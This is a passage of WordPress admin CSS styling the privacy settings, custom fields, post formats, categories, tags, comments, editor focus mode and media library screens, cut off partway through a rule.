.health-check-accordion-panel[hidden] { display: none; } .privacy-settings-accordion-panel a .dashicons, .health-check-accordion-panel a .dashicons { text-decoration: none; } .privacy-settings-accordion-actions { justify-content: right; display: flex; align-items: center; flex-wrap: wrap; gap: 1em; } .privacy-settings-accordion-actions .success { display: none; color: #007017; } .privacy-settings-accordion-actions .success.visible { display: inline-block; } /* Suggested text for privacy policy */ .privacy-settings-accordion-panel.hide-privacy-policy-tutorial .wp-policy-help, /* For back-compat, see #49282 */ .privacy-settings-accordion-panel.hide-privacy-policy-tutorial .privacy-policy-tutorial, .privacy-settings-accordion-panel.hide-privacy-policy-tutorial .privacy-text-copy { display: none; } .privacy-settings-accordion-panel strong.wp-policy-help, /* For back-compat, see #49282 */ .privacy-settings-accordion-panel strong.privacy-policy-tutorial { display: block; margin: 0 0 1em; } .privacy-text-copy span { pointer-events: none; } .privacy-settings-accordion-panel .wp-suggested-text > *:not(h1):not(h2):not(h3):not(h4):not(h5):not(h6):not(div):not(.privacy-policy-tutorial):not(.wp-policy-help):not(.privacy-text-copy):not(span.success):not(.notice p), .privacy-settings-accordion-panel .wp-suggested-text div > *:not(h1):not(h2):not(h3):not(h4):not(h5):not(h6):not(div):not(.privacy-policy-tutorial):not(.wp-policy-help):not(.privacy-text-copy):not(span.success):not(.notice p), .privacy-settings-accordion-panel > *:not(h1):not(h2):not(h3):not(h4):not(h5):not(h6):not(div):not(.privacy-policy-tutorial):not(.wp-policy-help):not(.privacy-text-copy):not(span.success):not(.notice p), .privacy-settings-accordion-panel div > *:not(h1):not(h2):not(h3):not(h4):not(h5):not(h6):not(div):not(.privacy-policy-tutorial):not(.wp-policy-help):not(.privacy-text-copy):not(span.success):not(.notice p) { margin: 0; padding: 1em; border-left: 2px solid #787c82; } /* Media queries */ @media screen and (max-width: 782px) { .privacy-settings-body, .health-check-body { margin: 0 12px; width: auto; } .privacy-settings .notice, .site-health .notice { margin: 5px 10px 15px; } .privacy-settings .update-nag, .site-health .update-nag { margin-right: 10px; margin-left: 10px; } input#create-page { margin-top: 10px; } .wp-core-ui button.privacy-text-copy { white-space: normal; line-height: 1.8; } #edit-slug-box { padding: 0; } #editable-post-name input { min-height: 40px; } } @media only screen and (max-width: 1004px) { .privacy-settings-body, .health-check-body { margin: 0 22px; width: auto; } } /** * End Privacy Settings section */ /*------------------------------------------------------------------------------ 11.1 - Custom Fields ------------------------------------------------------------------------------*/ #postcustomstuff thead th { padding: 5px 8px 8px; background-color: #f0f0f1; } #postcustom #postcustomstuff .submit { border: 0 none; float: none; padding: 0 8px 8px; } #postcustom #postcustomstuff .add-custom-field { padding: 12px 8px 8px; } #side-sortables #postcustom #postcustomstuff .submit { margin: 0; padding: 0; } #side-sortables #postcustom #postcustomstuff #the-list textarea { height: 85px; } #side-sortables #postcustom #postcustomstuff td.left input, #side-sortables #postcustom #postcustomstuff td.left select, #side-sortables #postcustomstuff #newmetaleft a { margin: 3px 3px 0; } #postcustomstuff table { margin: 0; width: 100%; border: 1px solid #dcdcde; border-spacing: 0; background-color: #f6f7f7; } #postcustomstuff tr { vertical-align: top; } #postcustomstuff table input, #postcustomstuff table select, #postcustomstuff table textarea { width: 96%; margin: 8px; } #side-sortables #postcustomstuff table input, #side-sortables #postcustomstuff table select, #side-sortables #postcustomstuff table textarea { margin: 3px; } #postcustomstuff th.left, #postcustomstuff td.left { width: 38%; } #postcustomstuff .submit input { margin: 0; width: auto; } #postcustomstuff #newmetaleft a, #postcustomstuff #newmeta-button { display: inline-block; margin: 0 8px 8px; text-decoration: none; } .no-js #postcustomstuff #enternew { display: none; } #post-body-content .compat-attachment-fields { margin-bottom: 20px; } .compat-attachment-fields th { padding-top: 5px; padding-right: 10px; } /*------------------------------------------------------------------------------ 11.3 - Featured Images ------------------------------------------------------------------------------*/ #select-featured-image { padding: 4px 0; overflow: hidden; } #select-featured-image img { max-width: 100%; height: auto; margin-bottom: 10px; } #select-featured-image a { float: left; clear: both; } #select-featured-image .remove { display: none; margin-top: 10px; } .js #select-featured-image.has-featured-image .remove { display: inline-block; } .no-js #select-featured-image .choose { display: none; } /*------------------------------------------------------------------------------ 11.4 - Post formats ------------------------------------------------------------------------------*/ .post-format-icon::before { display: inline-block; vertical-align: middle; height: 20px; width: 20px; margin-top: -4px; margin-right: 7px; color: #dcdcde; font: normal 20px/1 dashicons; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } a.post-format-icon:hover:before { color: #135e96; } #post-formats-select { line-height: 2; } #post-formats-select .post-format-icon::before { top: 5px; } input.post-format { margin-top: 1px; } label.post-format-icon { margin-left: 0; padding: 2px 0; } .post-format-icon.post-format-standard::before { content: "\f109"; content: "\f109" / ''; } .post-format-icon.post-format-image::before { content: "\f128"; content: "\f128" / ''; } .post-format-icon.post-format-gallery::before { content: "\f161"; content: "\f161" / ''; } .post-format-icon.post-format-audio::before { content: "\f127"; content: "\f127" / ''; } .post-format-icon.post-format-video::before { content: "\f126"; content: "\f126" / ''; } .post-format-icon.post-format-chat::before { content: "\f125"; content: "\f125" / ''; } .post-format-icon.post-format-status::before { content: "\f130"; content: "\f130" / ''; } .post-format-icon.post-format-aside::before { content: "\f123"; content: "\f123" / ''; } .post-format-icon.post-format-quote::before { content: "\f122"; content: "\f122" / ''; } .post-format-icon.post-format-link::before { content: "\f103"; content: "\f103" / ''; } /*------------------------------------------------------------------------------ 12.0 - Categories ------------------------------------------------------------------------------*/ .category-adder { margin-left: 120px; padding: 4px 0; } .category-adder h4 { margin: 0 0 8px; } #side-sortables .category-adder { margin: 0; } .wp-tab-panel, .categorydiv div.tabs-panel, .customlinkdiv div.tabs-panel, .posttypediv div.tabs-panel, .taxonomydiv div.tabs-panel { min-height: 42px; max-height: 200px; overflow: auto; padding: 0 0.9em; border: solid 1px #dcdcde; background-color: #fff; } div.tabs-panel-active { display: block; } div.tabs-panel-inactive { display: none; } div.tabs-panel-active:focus { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .options-discussion-php .indent-children ul, #front-page-warning, #front-static-pages ul, ul.export-filters, .inline-editor ul.cat-checklist ul, .categorydiv ul.categorychecklist ul, .customlinkdiv ul.categorychecklist ul, .posttypediv ul.categorychecklist ul, .taxonomydiv ul.categorychecklist ul { margin-left: 18px; } ul.categorychecklist li { margin: 0; padding: 0; line-height: 1.69230769; word-wrap: break-word; } .categorydiv .tabs-panel, .customlinkdiv .tabs-panel, .posttypediv .tabs-panel, .taxonomydiv .tabs-panel { border-width: 3px; border-style: solid; } .form-wrap label { display: block; padding: 2px 0; } .form-field input[type="text"], .form-field input[type="password"], .form-field input[type="email"], .form-field input[type="number"], .form-field input[type="search"], .form-field input[type="tel"], .form-field input[type="url"], .form-field textarea { border-style: solid; border-width: 1px; width: 95%; } .form-field select, .form-field p { max-width: 95%; } p.description, .form-wrap p { margin: 2px 0 5px; color: #646970; } p.help, p.description, span.description, .form-wrap p { font-size: 13px; } p.description code { font-style: normal; } p.description code, .form-wrap p code { color: #50575e; } .form-wrap .form-field { margin: 1em 0; padding: 0; } .col-wrap h2 { margin: 12px 0; font-size: 1.1em; } .col-wrap p.submit { margin-top: -10px; } .edit-term-notes { margin-top: 2em; } /*------------------------------------------------------------------------------ 13.0 - Tags ------------------------------------------------------------------------------*/ #poststuff .tagsdiv .ajaxtag { margin-top: 1em; display: flex; gap: 8px; align-items: center; } #poststuff .tagsdiv .howto { margin: 1em 0 6px; } .ajaxtag .newtag { position: relative; } .tagsdiv .newtag { flex: 1; min-width: 0; } .tagsdiv .the-tags { display: block; height: 60px; margin: 0 auto; overflow: auto; width: 260px; } #post-body-content .tagsdiv .the-tags { margin: 0 5px; } p.popular-tags { border: none; line-height: 2em; padding: 8px 12px 12px; text-align: justify; } p.popular-tags a { padding: 0 3px; } .tagcloud { width: 97%; margin: 0 0 40px; text-align: justify; } .tagcloud h2 { margin: 2px 0 12px; } #poststuff .inside .the-tagcloud { margin: 5px 0 10px; padding: 8px; border: 1px solid #dcdcde; line-height: 1.2; word-spacing: 3px; } .the-tagcloud ul { margin: 0; } .the-tagcloud ul li { display: inline-block; } /* Back-compat styles from deprecated jQuery.suggest, see ticket #40260. */ .ac_results { display: none; margin: -1px 0 0; padding: 0; list-style: none; position: absolute; z-index: 10000; border: 1px solid #4f94d4; background-color: #fff; } .wp-customizer .ac_results { z-index: 500000; } .ac_results li { margin: 0; padding: 5px 10px; white-space: nowrap; text-align: left; } .ac_results .ac_over, .ac_over .ac_match { background-color: #2271b1; color: #fff; cursor: pointer; } .ac_match { text-decoration: underline; } #addtag .spinner { float: none; vertical-align: top; } #edittag { max-width: 800px; } .edit-tag-actions { display: flex; align-items: center; gap: 8px; margin-top: 20px; } /* Comments */ .comment-php .wp-editor-area { height: 200px; } .comment-ays th, .comment-ays td { padding: 10px 15px; } .comment-ays .comment-content ul { list-style: initial; margin-left: 2em; } .comment-ays .comment-content a[href]:after { content: "(" attr( href ) ")"; display: inline-block; padding: 0 4px; color: #646970; font-size: 13px; word-break: break-all; } .comment-ays .comment-content p.edit-comment { margin-top: 10px; } .comment-ays .comment-content p.edit-comment a[href]:after { content: ""; padding: 0; } .comment-ays-submit .button-cancel { margin-left: 1em; } .trash-undo-inside, .spam-undo-inside { margin: 1px 8px 1px 0; line-height: 1.23076923; } .spam-undo-inside .avatar, .trash-undo-inside .avatar { height: 20px; width: 20px; margin-right: 8px; vertical-align: middle; } .stuffbox .editcomment { clear: none; margin-top: 0; } #namediv.stuffbox .editcomment input { width: 100%; } #namediv.stuffbox .editcomment.form-table td { padding: 10px; } #comment-status-radio p { margin: 3px 0 5px; } #comment-status-radio input { margin: 2px 3px 5px 0; vertical-align: middle; } #comment-status-radio label { padding: 5px 0; } /* links tables */ table.links-table { width: 100%; border-spacing: 0; } .links-table th { font-weight: 400; text-align: left; vertical-align: top; min-width: 80px; width: 20%; word-wrap: break-word; } .links-table th, .links-table td { padding: 5px 0; } .links-table td label { margin-right: 8px; } .links-table td input[type="text"], .links-table td textarea { width: 100%; } .links-table #link_rel { max-width: 280px; } /* DFW 2 -------------------------------------------------------------- */ #qt_content_dfw { display: none; } .wp-editor-expand #qt_content_dfw { display: inline-block; } .focus-on .wrap > h1, .focus-on .page-title-action, .focus-on #wpfooter, .focus-on .postbox-container > *, .focus-on div.updated, .focus-on div.error, .focus-on div.notice, .focus-on .update-nag, .focus-on #wp-toolbar, .focus-on #screen-meta-links, .focus-on #screen-meta { opacity: 0; transition-duration: 0.6s; transition-property: opacity; transition-timing-function: ease-in-out; } .focus-on #wp-toolbar { opacity: 0.3; } .focus-off .wrap > h1, .focus-off .page-title-action, .focus-off #wpfooter, .focus-off .postbox-container > *, .focus-off div.updated, .focus-off div.error, .focus-off div.notice, .focus-off .update-nag, .focus-off #wp-toolbar, .focus-off #screen-meta-links, .focus-off #screen-meta { opacity: 1; transition-duration: 0.2s; transition-property: opacity; transition-timing-function: ease-in-out; } .focus-off #wp-toolbar { -webkit-transform: translate(0, 0); } .focus-on #adminmenuback, .focus-on #adminmenuwrap { transition-duration: 0.6s; transition-property: transform; transition-timing-function: ease-in-out; } .focus-on #adminmenuback, .focus-on #adminmenuwrap { transform: translateX( -100% ); } .focus-off #adminmenuback, .focus-off #adminmenuwrap { transform: translateX( 0 ); transition-duration: 0.2s; transition-property: transform; transition-timing-function: ease-in-out; } /* =Media Queries -------------------------------------------------------------- */ /** * HiDPI Displays */ @media print, (min-resolution: 120dpi) { #content-resize-handle, #post-body .wp_themeSkin .mceStatusbar a.mceResize { background: transparent url(../images/resize-2x.gif) no-repeat scroll right bottom; background-size: 11px 11px; } /*rtl:ignore*/ .rtl #content-resize-handle, .rtl #post-body .wp_themeSkin .mceStatusbar a.mceResize { background-image: url(../images/resize-rtl-2x.gif); background-position: left bottom; } } /* * The edit attachment screen auto-switches to one column layout when the * viewport is smaller than 1200 pixels. */ @media only screen and (max-width: 1200px) { .post-type-attachment #poststuff { min-width: 0; } .post-type-attachment #wpbody-content #poststuff #post-body { margin: 0; } .post-type-attachment #wpbody-content #post-body.columns-2 #postbox-container-1 { margin-right: 0; width: 100%; } .post-type-attachment #poststuff #postbox-container-1 .empty-container, .post-type-attachment #poststuff #postbox-container-1 #side-sortables:empty { outline: none; height: 0; min-height: 0; } .post-type-attachment #poststuff #post-body.columns-2 #side-sortables { min-height: 0; width: auto; } .is-dragging-metaboxes.post-type-attachment #post-body .meta-box-sortables { border: none; background: transparent; min-height: 0; margin-bottom: 0; } /* hide the radio buttons for column prefs */ .post-type-attachment .screen-layout, .post-type-attachment .columns-prefs { display: none; } } /* one column on the post write/edit screen */ @media only screen and (max-width: 850px) { #poststuff { min-width: 0; } #wpbody-content #poststuff #post-body { margin: 0; } #wpbody-content #post-body.columns-2 #postbox-container-1 { margin-right: 0; width: 100%; } #poststuff #postbox-container-1 .empty-container, #poststuff #postbox-container-1 #side-sortables:empty { height: 0; min-height: 0; } #poststuff #post-body.columns-2 #side-sortables { min-height: 0; width: auto; } /* Increase min-height while dragging for the #side-sortables and any potential sortables area with custom ID. */ .is-dragging-metaboxes #poststuff #postbox-container-1 .empty-container, .is-dragging-metaboxes #poststuff #postbox-container-1 #side-sortables:empty, .is-dragging-metaboxes #poststuff #post-body.columns-2 #side-sortables, .is-dragging-metaboxes #poststuff #post-body.columns-2 .meta-box-sortables { height: auto; min-height: 60px; } /* hide the radio buttons for column prefs */ .screen-layout, .columns-prefs { display: none; } } @media screen and (max-width: 782px) { .wp-core-ui .edit-tag-actions .button-primary { margin-bottom: 0; } #post-body-content { min-width: 0; } #titlediv #title-prompt-text { padding: 10px; } #poststuff .stuffbox .inside { padding: 0 2px 4px 0; } #poststuff h3.hndle, /* Back-compat for pre-4.4 */ #poststuff .stuffbox > h3, /* Back-compat for pre-4.4 */ #poststuff h2 { padding: 12px; } #namediv.stuffbox .editcomment.form-table td { padding: 5px 10px; } .post-format-options { padding-right: 0; } .post-format-options a { margin-right: 5px; margin-bottom: 5px; min-width: 52px; } .post-format-options .post-format-title { font-size: 11px; } .post-format-options a div { height: 28px; width: 28px; } .post-format-options a div:before { font-size: 26px !important; } /* Publish Metabox Options */ #post-visibility-select { line-height: 280%; } .wp-core-ui .save-post-visibility, .wp-core-ui .save-timestamp { vertical-align: middle; margin-right: 15px; } .timestamp-wrap select#mm { display: block; width: 100%; margin-bottom: 10px; } .timestamp-wrap #jj, .timestamp-wrap #aa, .timestamp-wrap #hh, .timestamp-wrap #mn { padding: 12px 3px; font-size: 14px; margin-bottom: 5px; width: auto; text-align: center; } /* Categories Metabox */ ul.category-tabs { margin: 30px 0 15px; } ul.category-tabs li.tabs { padding: 15px; } ul.categorychecklist li { margin-bottom: 15px; } ul.categorychecklist ul { margin-top: 15px; } .category-add input[type=text], .category-add select { max-width: none; margin-bottom: 15px; } /* Tags Metabox */ .tagsdiv .newtag { flex: 1; min-width: 0; height: auto; margin-bottom: 0; } .tagchecklist { margin: 25px 10px; } .tagchecklist > li { font-size: 16px; line-height: 1.4; } /* Discussion */ #commentstatusdiv p { line-height: 2.8; } /* TinyMCE Adjustments */ .mceToolbar * { white-space: normal !important; } .mceToolbar tr, .mceToolbar td { float: left !important; } .wp_themeSkin a.mceButton { width: 30px; height: 30px; } .wp_themeSkin .mceButton .mceIcon { margin-top: 5px; margin-left: 5px; } .wp_themeSkin .mceSplitButton { margin-top: 1px; } .wp_themeSkin .mceSplitButton td a.mceAction { padding: 6px 3px 6px 6px; } .wp_themeSkin .mceSplitButton td a.mceOpen, .wp_themeSkin .mceSplitButtonEnabled:hover td a.mceOpen { padding-top: 6px; padding-bottom: 6px; background-position: 1px 6px; } .wp_themeSkin table.mceListBox { margin: 5px; } div.quicktags-toolbar input { padding: 10px 20px; } button.wp-switch-editor { font-size: 16px; line-height: 1; margin: 7px 0 0 7px; padding: 8px 12px; } #wp-content-media-buttons a { font-size: 14px; padding: 6px 10px; } .wp-media-buttons span.wp-media-buttons-icon, .wp-media-buttons span.jetpack-contact-form-icon { width: 22px !important; margin-left: -2px !important; } .wp-media-buttons .add_media span.wp-media-buttons-icon:before, .wp-media-buttons #insert-jetpack-contact-form span.jetpack-contact-form-icon:before { font-size: 20px !important; } #content_wp_fullscreen { display: none; } .misc-pub-section { padding: 12px 10px; } #delete-action, #publishing-action { line-height: 3.61538461; } #publishing-action .spinner { float: none; margin-top: -2px; /* Half of the Publish button's bottom margin. */ } /* Moderate Comment */ .comment-ays th, .comment-ays td { padding-bottom: 0; } .comment-ays td { padding-top: 6px; } /* Links */ .links-table #link_rel { max-width: none; } .links-table th, .links-table td { padding: 10px 0; } .edit-term-notes { display: none; } .privacy-text-box { width: auto; } .privacy-text-box-toc { float: none; width: auto; height: 100%; display: flex; flex-direction: column; } .privacy-text-section .return-to-top { margin: 2em 0 0; } } /*------------------------------------------------------------------------------ 14.0 - Media Screen ------------------------------------------------------------------------------*/ .media-item .describe { border-collapse: collapse; width: 100%; border-top: 1px solid #dcdcde; clear: both; cursor: default; } .media-item.media-blank .describe { border: 0; } .media-item .describe th { vertical-align: top; text-align: left; padding: 5px 10px 10px; width: 140px; } .media-item .describe .align th { padding-top: 0; } .media-item .media-item-info tr { background-color: transparent; } .media-item .describe td { padding: 0 8px 8px 0; vertical-align: top; } .media-item thead.media-item-info td { padding: 4px 10px 0; } .media-item .media-item-info .A1B1 { padding: 0 0 0 10px; } .media-item td.savesend { padding-bottom: 15px; } .media-item .thumbnail { max-height: 128px; max-width: 128px; } .media-list-subtitle { display: block; } .media-list-title { display: block; } #wpbody-content #async-upload-wrap a { display: none; } .media-upload-form { margin-top: 20px; } .media-upload-form td label { margin-right: 6px; margin-left: 2px; } .media-upload-form .align .field label { display: inline; padding: 0 0 0 23px; margin: 0 1em 0 3px; font-weight: 600; } .media-upload-form tr.image-size label { margin: 0 0 0 5px; font-weight: 600; } .media-upload-form th.label label { font-weight: 600; margin: 0.5em; font-size: 13px; } .media-upload-form th.label label span { padding: 0 5px; } .media-item .describe input[type="text"], .media-item .describe textarea { width: 460px; } .media-item .describe p.help { margin: 0; padding: 0 0 0 5px; } .describe-toggle-on, .describe-toggle-off { display: block; line-height: 2.76923076; float: right; margin-right: 10px; } .media-item .attachment-tools { display: flex; align-items: center; } .media-item .edit-attachment { padding: 14px 0; display: block; margin-right: 10px; } .media-item .edit-attachment.copy-to-clipboard-container { display: flex; margin-top: 0; } .media-item-copy-container .success { line-height: 0; } .media-item button .copy-attachment-url { margin-top: 14px; } .media-item .copy-to-clipboard-container { margin-top: 7px; } .media-item .describe-toggle-off, .media-item.open .describe-toggle-on { display: none; } .media-item.open .describe-toggle-off { display: block; } .media-upload-form .media-item { min-height: 70px; margin-bottom: 1px; position: relative; width: 100%; background: #fff; } .media-upload-form .media-item, .media-upload-form .media-item .error { box-shadow: 0 1px 0 #dcdcde; } #media-items:empty { border: 0 none; } .media-item .filename { padding: 14px 2px; overflow: hidden; margin-left: 4px; } .media-item .pinkynail { float: left; margin: 14px; max-height: 70px; max-width: 70px; } .media-item .startopen, .media-item .startclosed { display: none; } .media-item .progress { display: inline-block; height: 22px; margin: 0 6px 7px; width: 200px; line-height: 2em; padding: 0; overflow: hidden; border-radius: 22px; background: #dcdcde; box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1); } .media-item .bar { z-index: 9; width: 0; height: 100%; margin-top: -22px; border-radius: 22px; background-color: #2271b1; box-shadow: inset 0 0 2px rgba(0, 0, 0, 0.3); } .media-item .progress .percent { z-index: 10; position: relative; width: 200px; padding: 0; color: #fff; text-align: center; line-height: 22px; font-weight: 400; text-shadow: 0 1px 2px rgba(0, 0, 0, 0.2); } .upload-php .fixed .column-parent { width: 15%; } .js .html-uploader #plupload-upload-ui { display: none; } .js .html-uploader #html-upload-ui { display: block; } #html-upload-ui #async-upload { font-size: 1em; } .media-upload-form .media-item.error, .media-upload-form .media-item .error { width: auto; margin: 0 0 1px; } .media-upload-form .media-item .error { padding: 10px 0 10px 14px; min-height: 50px; } .media-item .error-div button.dismiss { float: right; margin: 0 10px 0 15px; } /*------------------------------------------------------------------------------ 14.1 - Media Library ------------------------------------------------------------------------------*/ .find-box { background-color: #fff; box-shadow: 0 3px 6px rgba(0, 0, 0, 0.3); width: 600px; overflow: hidden; margin-left: -300px; position: fixed; top: 30px; bottom: 30px; left: 50%; z-index: 100105; } .find-box-head { background: #fff; border-bottom: 1px solid #dcdcde; height: 36px; font-size: 18px; font-weight: 600; line-height: 2; padding: 0 36px 0 16px; position: absolute; top: 0; left: 0; right: 0; } .find-box-inside { overflow: auto; padding: 16px; background-color: #fff; position: absolute; top: 37px; bottom: 45px; overflow-y: scroll; width: 100%; box-sizing: border-box; } .find-box-search { padding-bottom: 16px; } .find-box-search .spinner { float: none; left: 105px; position: absolute; } .find-box-search, #find-posts-response { position: relative; /* RTL fix, #WP28010 */ } #find-posts-input, #find-posts-search { float: left; } #find-posts-input { width: 140px; height: 28px; margin: 0 4px 0 0; } .widefat .found-radio { padding-right: 0; width: 16px; } #find-posts-close { width: 36px; height: 36px; border: none; padding: 0; position: absolute; top: 0; right: 0; cursor: pointer; text-align: center; background: none; color: #646970; } #find-posts-close:hover, #find-posts-close:focus { color: var(--wp-admin-theme-color-darker-20, #183ad6); } #find-posts-close:focus { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; outline-offset: -2px; } #find-posts-close:before { font: normal 20px/36px dashicons; vertical-align: top; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; content: "\f158"; content: "\f158" / ''; } .find-box-buttons { padding: 8px 16px; background: #fff; border-top: 1px solid #dcdcde; position: absolute; bottom: 0; left: 0; right: 0; } @media screen and (max-width: 782px) { .find-box-inside { bottom: 57px; } #delete_all { margin-bottom: 0; } } @media screen and (max-width: 660px) { .find-box { top: 0; bottom: 0; left: 0; right: 0; margin: 0; width: 100%; } } .ui-find-overlay { position: fixed; top: 0; left: 0; right: 0; bottom: 0; background: #000; opacity: 0.7; filter: alpha(opacity=70); z-index: 100100; } .drag-drop #drag-drop-area { border: 4px dashed #c3c4c7; height: 200px; } .drag-drop .drag-drop-inside { margin: 60px auto 0; width: 250px; } .drag-drop-inside p { font-size: 14px; margin: 5px 0; display: none; } .drag-drop .drag-drop-inside p { text-align: center; } .drag-drop-inside p.drag-drop-info { font-size: 20px; } .drag-drop .drag-drop-inside p, .drag-drop-inside p.drag-drop-buttons { display: block; } /* #drag-drop-area:-moz-drag-over { border-color: #83b4d8; } border color while dragging a file over the uploader drop area */ .drag-drop.drag-over #drag-drop-area { border-color: #9ec2e6; } #plupload-upload-ui { position: relative; } .post-type-attachment .wp-filter select { margin: 0 6px 0 0; } /** * Media Library grid view */ .media-frame.mode-grid, .media-frame.mode-grid .media-frame-content, .media-frame.mode-grid .attachments-browser:not(.has-load-more) .attachments, .media-frame.mode-grid .attachments-browser.has-load-more .attachments-wrapper, .media-frame.mode-grid .uploader-inline-content { position: static; } /* Regions we don't use at all */ .media-frame.mode-grid .media-frame-title, .media-frame.mode-grid .media-frame-router, .media-frame.mode-grid .media-frame-menu { display: none; } .media-frame.mode-grid .media-frame-content { background-color: transparent; border: none; } .upload-php .mode-grid .media-sidebar { position: relative; width: auto; margin-top: 12px; padding: 0 16px; border-left: 4px solid #d63638; box-shadow: 0 1px 1px 0 rgba(0, 0, 0, 0.1); background-color: #fff; } .upload-php .mode-grid .hide-sidebar .media-sidebar { display: none; } .upload-php .mode-grid .media-sidebar .media-uploader-status { border-bottom: none; padding-bottom: 0; max-width: 100%; } .upload-php .mode-grid .media-sidebar .upload-error { margin: 12px 0; padding: 4px 0 0; border: none; box-shadow: none; background: none; } .upload-php .mode-grid .media-sidebar .media-uploader-status.errors h2 { display: none; } .media-frame.mode-grid .uploader-inline { position: relative; top: auto; right: auto; left: auto; bottom: auto; padding-top: 0; margin-top: 20px; border: 4px dashed #c3c4c7; } .media-frame.mode-select .attachments-browser.fixed:not(.has-load-more) .attachments, .media-frame.mode-select .attachments-browser.has-load-more.fixed .attachments-wrapper { position: relative; top: 94px; /* prevent jumping up when the toolbar becomes fixed */ padding-bottom: 94px; /* offset for above so the bottom doesn't get cut off */ } .media-frame.mode-grid .attachment:focus, .media-frame.mode-grid .selected.attachment:focus, .media-frame.mode-grid .attachment.details:focus { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; outline-offset: -6px; } .media-frame.mode-grid .selected.attachment { box-shadow: inset 0 0 0 5px #f0f0f1, inset 0 0 0 7px #c3c4c7; } .media-frame.mode-grid .attachment.details { box-shadow: inset 0 0 0 3px #f0f0f1, inset 0 0 0 7px var(--wp-admin-theme-color, #3858e9); } .media-frame.mode-grid.mode-select .attachment .thumbnail { opacity: 0.65; } .media-frame.mode-select .attachment.selected .thumbnail { opacity: 1; } .media-frame.mode-grid .media-toolbar { margin-bottom: 15px; height: auto; } .media-frame.mode-grid .media-toolbar label:not(.media-search-input-label) { border: 0; clip-path: inset(50%); height: 1px; margin: -1px; overflow: hidden; padding: 0; position: absolute; width: 1px; /* Many screen reader and browser combinations announce broken words as they would appear visually. */ word-wrap: normal !important; word-break: normal !important; } .media-frame.mode-grid .media-toolbar select { margin: 0 10px 0 0; min-height: 32px; line-height: 2.14285714; /* 30px for 32px height with 14px font */ padding: 0 24px 0 8px; } .media-frame.mode-grid .media-toolbar input[type="search"] { min-height: 32px; padding: 0 8px; } .media-frame.mode-grid .media-toolbar-secondary { display: flex; flex-wrap: wrap; align-items: center; gap: 8px; } .media-frame.mode-grid.mode-edit .media-toolbar-secondary > .select-mode-toggle-button { margin: 0 8px 0 0; height: 100%; } .media-frame.mode-grid .attachments-browser .bulk-select { display: inline-block; margin: 0 10px 0 0; } .media-frame.mode-grid .search { margin-top: 0; } .media-frame-content .media-search-input-label { vertical-align: baseline; } .attachments-browser .media-toolbar-secondary > .media-button { margin-right: 10px; } .media-frame.mode-select .attachments-browser.fixed .media-toolbar { position: fixed; top: 32px; left: auto; right: 20px; margin-top: 0; } .media-frame.mode-grid .attachments-browser { padding: 0; } .media-frame.mode-grid .attachments-browser .attachments { padding: 2px; } .media-frame.mode-grid .attachments-browser .no-media { color: #646970; /* same as no plugins and no themes */ font-size: 18px; font-style: normal; margin: 0; padding: 100px 0 0; text-align: center; } /** * Attachment details modal */ .edit-attachment-frame { display: block; height: 100%; width: 100%; } .edit-attachment-frame .edit-media-header { overflow: hidden; } .upload-php .media-modal-close .media-modal-icon:before { content: "\f335"; content: "\f335" / ''; font-size: 22px; } .upload-php .media-modal-close, .edit-attachment-frame .edit-media-header .left, .edit-attachment-frame .edit-media-header .right { cursor: pointer; color: #787c82; background-color: transparent; height: 50px; width: 50px; padding: 0; position: absolute; text-align: center; border: 0; border-left: 1px solid #dcdcde; transition: color .1s ease-in-out, background .1s ease-in-out; } .upload-php .media-modal-close { top: 0; right: 0; } .edit-attachment-frame .edit-media-header .left { right: 102px; } .edit-attachment-frame .edit-media-header .right { right: 51px; } .edit-attachment-frame .media-frame-title { left: 0; right: 150px; /* leave space for prev/next/close */ } .edit-attachment-frame .edit-media-header .right:before, .edit-attachment-frame .edit-media-header .left:before { font: normal 20px/50px dashicons !important; display: inline; font-weight: 300; } .upload-php .media-modal-close:hover, .upload-php .media-modal-close:focus, .edit-attachment-frame .edit-media-header .left:hover, .edit-attachment-frame .edit-media-header .right:hover, .edit-attachment-frame .edit-media-header .left:focus, .edit-attachment-frame .edit-media-header .right:focus { background: #dcdcde; border-color: #c3c4c7; color: #000; outline: none; box-shadow: none; } .upload-php .media-modal-close:focus, .edit-attachment-frame .edit-media-header .left:focus, .edit-attachment-frame .edit-media-header .right:focus { /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; outline-offset: -2px; } .upload-php .media-modal-close:focus .media-modal-icon:before, .upload-php .media-modal-close:hover .media-modal-icon:before { color: #000; } .edit-attachment-frame .edit-media-header .left:before { content: "\f341"; content: "\f341" / ''; } .edit-attachment-frame .edit-media-header .right:before { content: "\f345"; content: "\f345" / ''; } .edit-attachment-frame .edit-media-header [disabled], .edit-attachment-frame .edit-media-header [disabled]:hover { color: #c3c4c7; background: inherit; cursor: default; } .edit-attachment-frame .media-frame-content, .edit-attachment-frame .media-frame-router { left: 0; } .edit-attachment-frame .media-frame-content { border-bottom: none; bottom: 0; top: 50px; } .edit-attachment-frame .attachment-details { position: absolute; overflow: auto; top: 0; bottom: 0; right: 0; left: 0; box-shadow: inset 0 4px 4px -4px rgba(0, 0, 0, 0.1); } .edit-attachment-frame .attachment-media-view { float: left; width: 65%; height: 100%; } .edit-attachment-frame .attachment-media-view .thumbnail { box-sizing: border-box; padding: 16px; height: 100%; } .edit-attachment-frame .attachment-media-view .details-image { display: block; margin: 0 auto 16px; max-width: 100%; max-height: 90%; max-height: calc( 100% - 56px ); /* leave space for actions underneath */ background-image: linear-gradient(45deg, #c3c4c7 25%, transparent 25%, transparent 75%, #c3c4c7 75%, #c3c4c7), linear-gradient(45deg, #c3c4c7 25%, transparent 25%, transparent 75%, #c3c4c7 75%, #c3c4c7); background-position: 0 0, 10px 10px; background-size: 20px 20px; } .edit-attachment-frame .attachment-media-view .details-image.icon { background: none; } .edit-attachment-frame .attachment-media-view .attachment-actions { text-align: center; } .edit-attachment-frame .wp-media-wrapper { margin-bottom: 12px; } .edit-attachment-frame input, .edit-attachment-frame textarea { padding: 4px 8px; line-height: 1.42857143; } .edit-attachment-frame .attachment-info 